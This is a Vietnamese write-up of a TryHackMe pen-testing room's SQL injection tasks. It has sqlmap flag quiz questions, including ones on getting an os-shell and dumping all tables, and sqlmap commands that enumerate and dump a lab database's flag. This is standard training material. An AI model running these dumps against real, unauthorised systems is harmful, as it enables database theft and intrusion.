CC: Pen Testing - Cơ bản - Tryhackme - Write Up

Task 15 [Section 5 - SQL Injection]: Intro

SQL injection là kỹ thuật sử dụng một truy vấn SQL để bạn có thể truy cập vào cơ sở dữ liệu của mục tiêu tấn công . Kỹ thuật này thường được sử dụng để lấy dữ liệu của người dùng như mật khẩu, email, v.v. Lỗi SQL là một trong những lỗ hổng web phổ biến nhất và do đó, nó rất đáng để kiểm tra và thực hành.

Task 16 [Section 5 - SQL Injection]: sqlmap

Sqlmap được cho là công cụ tấn công chèn lệnh truy vấn SQL tự động phổ biến nhất. Nó kiểm tra các loại lỗi SQL khác nhau và có nhiều tùy chọn tùy chỉnh.

Answer the questions below
How do you specify which url to check?
What about which google dork to use?
How do you select(lol) which parameter to use?(Example: in the url http://ex.com?test=1 the parameter would be test.)
What flag sets which database is in the target host's backend?(Example: If the flag is set to mysql then sqlmap will only test mysql injections).
How do you select the level of depth sqlmap should use(Higher = more accurate and more tests in general).
How do you dump the table entries of the database?
Which flag sets which db to enumerate?
(Case sensitive)
Which flag sets which table to enumerate?
(Case sensitive)
Which flag sets which column to enumerate?
(Case sensitive)
How do you ask sqlmap to try to get an interactive os-shell?
What flag dumps all data from every table

Task 17 [Section 5 - SQL Injection]: A Note on Manual SQL Injection

Đôi khi bạn sẽ không thể sử dụng sqlmap. Điều này có thể vì nhiều lý do, chẳng hạn như mục tiêu đã thiết lập tường lửa hoặc giới hạn yêu cầu. Trong trường hợp này, bạn nên biết cách thực hiện SQL Injection thủ công cơ bản, nếu chỉ để xác nhận rằng có lỗi SQL Injection. Bạn có thể tìm thấy danh sách các cách để kiểm tra SQL Injection tại đây.

Lưu ý: Vì có nhiều cách khác nhau để kiểm tra lỗi sql và sẽ rất khó để truyền đạt đúng cách kiểm tra sqli cho từng tình huống, nên sẽ không có câu hỏi nào cho nhiệm vụ này.

Task 18 [Section 5 - SQL Injection]: Vulnerable Web Application - CTF

Để trình bày cách sử dụng sqlmap để kiểm tra các lỗ hổng và kết xuất dữ liệu bảng, mình sẽ hướng dẫn bạn qua một ứng dụng web đơn giản.

Lưu ý: ví dụ này sẽ sử dụng sqlmap, tuy nhiên bạn có thể thử khai thác nó theo cách thủ công. Nó xuất ra toàn bộ truy vấn SQL sau mỗi lần thử, vì vậy bạn có thể biết mysql đang cố gắng làm gì!

Answer the questions below
Set the url to the machine ip, and run the command
How many types of sqli is the site vulnerable to?
Dump the database.
sqlmap -u http://ip --form --dbs --batch

What is the name of the database?    
How many tables are in the database?
sqlmap -u http://ip --form -D tests --tables --batch
sqlmap -u http://ip --form -D tests -T lol --columns --batch
sqlmap -u http://ip --form -D tests -T lol -C flag --dump --batch

What is the value of the flag?